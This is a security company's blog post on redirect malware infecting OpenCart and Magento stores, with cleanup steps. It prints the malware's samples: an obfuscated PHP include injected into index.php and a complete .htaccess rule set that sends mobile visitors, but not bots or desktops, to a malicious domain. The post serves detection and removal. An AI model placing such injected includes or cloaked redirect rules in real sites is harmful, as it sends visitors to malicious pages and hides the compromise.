911 Hack Removal

OpenCart & Magento Malware Redirecting to Malicious Advertising Websites – Steps to Find & Fix

Updated on: March 1, 2021

OpenCart & Magento Malware Redirecting to Malicious Advertising Websites – Steps to Find & Fix

An OpenCart & Magento malware redirecting both desktop and mobile websites to malicious links has been doing rounds. Since last week we have encountered several cases of this malware. There are no specific versions which are being targeted as we have seen this infection in a wide range of versions in both Magento & OpenCart.

Also, check our in-detailed blog post on the different type of malicious redirection and how to fix them.

How Does the Infection Look?

Ahead of blackfriday & cybermonday sales, this malware redirects anyone who visits the infected website to a website containing some offers. Either the websites where this is redirected have some offers or graphic content from porn-like looking websites. One of the customers that came to us has managed to remove some parts of the malware from the desktop website but still, it persisted on the mobile website. In some case, the redirection only happen via Google search (If you search your site in Google & then click on the link). It is mainly because to trick search engine bots to affect your SEO badly. Here’s how the this OpenCart & Magento malware redirecting infected website looks:

Consequences of Redirection Malware:

  • Redirection to malicious websites
  • Negative effect on search results
  • Increase in the creation of 404 pages
  • Errors in google webmasters
  • Increase in malicious files on the server
  • Decrease in traffic & sales due to above all

How to Find & Fix this OpenCart & Malware Website Redirection Spam:

The steps below might advise you to delete some pieces of code. However, sometimes hackers make malicious code look like legit one. So before deleting any files or code, it is recommended to take a backup. Below are the steps to find & fix:

  • Check index.php file: We found malicious code included in an index file. The malicious part of the code is encoded and it is difficult to tell what is does without decoding it. Here’s a snippet:
    <?php
    /*2e920*/
    
    @include "\x2fh\x6fm\x65/\x6ez\x67a\x72d\x65n\x2fp\x75b\x6ci\x63_\x68t\x6dl\x2fs\x79s... [[MALICIOUS CODE]]";
    
    /*2e920*/
    // Version
    define('VERSION', '2.0.1.0');
    
    // Configuration
    if (is_file('config.php')) {
    	require_once('config.php');
    }
    
    // Install
    if (!defined('DIR_APPLICATION')) {
    	header('Location: install/index.php');
    	exit;
    }
    
    // Startup
    require_once(DIR_SYSTEM . 'startup.php');
    
    // Registry
    $registry = new Registry();

    If you find this piece of code on the top of your index file, it is recommended to delete.

  • Be Sure to Check .htaccess: Another instance of malware can be found in .htaccess file of your server. Be sure to check .htaccess in root folder as well as the one in /admin folder also. A snipped from malware found in /admin folder:
    
    RewriteEngine on
    RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} opera\ mini [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} blackberry [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} (pre\/|palm\ os|palm|hiptop|avantgo|plucker|xiino|blazer|elaine) [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} (iris|3g_t|windows\ ce|opera\ mobi|windows\ ce;\ smartphone;|windows\ ce;\ iemobile) [NC,OR]
    RewriteCond %{HTTP:Accept} (text\/vnd\.wap\.wml|application\/vnd\.wap\.xhtml\+xml) [NC,OR]
    RewriteCond %{HTTP:Profile} .+ [NC,OR]
    RewriteCond %{HTTP:Wap-Profile} .+ [NC,OR]
    RewriteCond %{HTTP:x-wap-profile} .+ [NC,OR]
    RewriteCond %{HTTP:x-operamini-phone-ua} .+ [NC,OR]
    RewriteCond %{HTTP:x-wap-profile-diff} .+ [NC]
    RewriteCond %{QUERY_STRING} !noredirect [NC]
    RewriteCond %{HTTP_USER_AGENT} !^(Mozilla\/5\.0\ \(Linux;\ U;\ Android\ 2\.2;\ en-us;\ Nexus\ One\ Build/FRF91\)\ AppleWebKit\/533\.1\ \(KHTML,\ like\ Gecko\)\ Version\/4\.0\ Mobile\ Safari\/533\.1\ offline)$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !(windows\.nt|bsd|x11|unix|macos|macintosh|playstation|google|yandex|bot|libwww|msn|america|avant|download|fdm|maui|webmoney|windows-media-player) [NC]
    RewriteRule ^(.*)$ http://sswim.ru [L,R=302]
    

    All this code present in .htaccess file is malicious. This code redirects mobile devices to malicious domains. If you find this code, it should be removed immediately.

  • Look for fishy php files: This is the tricky part. Hackers usually name the files as very legit looking ones and tend to put malicious code in them. Sometimes a lot of code in these legit-looking files is non-harmful but there are a couple of lines that are working for the hackers. In this particular case we have found files like enjoy.php & unzip.php in various OpenCart/Magento directories.

opencart & magento malware redirections
This file called unzip.php allowed uploading of malicious files to the server
  • Webmasters don’t lie: Google often warns you if while indexing the website it detects fishy. And if Google is warning you, then you should be worried because this is when your search rankings can take a hit. Something similar happened in Japanese SEO Spam also, which has still been going around. Here’s an example of too many 404 pages being created by malware and google detecting it:
    OpenCar and Magento Malware Protection
  • Here’s what you can do from here..

    Infections like these hit your business really hard. Every hour of downtime is the loss of customers, reputation and most importantly bad impact on search engine rankings. Hackers after infecting the website have a tendency of leaving backdoors which are difficult to detect even by tech-savvy people. It is important to take a lesson from hacks like these and use a website firewall which protects your website 24x7x365!

    For now, if you need assistance in fixing this mess we’ll be happy to do for you. Just sign-up here and our engineers begin the cleanup process within 10-minutes of your signing up.

    Tags: , , , ,

    Shikhil Sharma

    Shikhil Sharma is the founder & CEO of Astra Security. Being involved with cybersecurity for over six years now, his vision is to make cyber security a 5-minute affair. Shikhil plays on the line between security and marketing. When not thinking about how to make Astra super simple, Shikhil can be found enjoying alternative rock or a game of football. Astra Security has been rewarded at Global Conference on Cyber Security by PM of India Mr. Narendra Modi. French President Mr. François Hollande also rewarded Astra under the La French Tech program. Astra Security is also a NASSCOM Emerge 50 company.
    Subscribe
    Notify of
    guest

    This site uses Akismet to reduce spam. Learn how your comment data is processed.

    4 Comments
    Oldest
    Newest Most Voted
    Inline Feedbacks
    View all comments
    trackback

    […] instance, a recent malware functioned by redirecting both Opencart and Magento desktop and mobile websites to malicious links. […]

    trackback

    […] Looking for malicious code in your index.php, searching for unwanted php files in core CMS files and checking your webmasters search console are the key things here. A more elaborate guide on how to deal with redirection issue can be found here. […]

    trackback

    […] in the database when you log in, or weird behavior such as when you visit your site and then it redirects you to a different […]

    trackback

    […] The site appears to be infected with malicious redirects. […]

    Psst! Hi there. We’re Astra.

    We make security simple and hassle-free for thousands
    of websites and businesses worldwide.

    Our suite of security products include a vulnerability scanner, firewall, malware scanner and pentests to protect your site from the evil forces on the internet, even when you sleep.

    earth spiders cards bugs spiders

    Made with ❤️ in USA France India Germany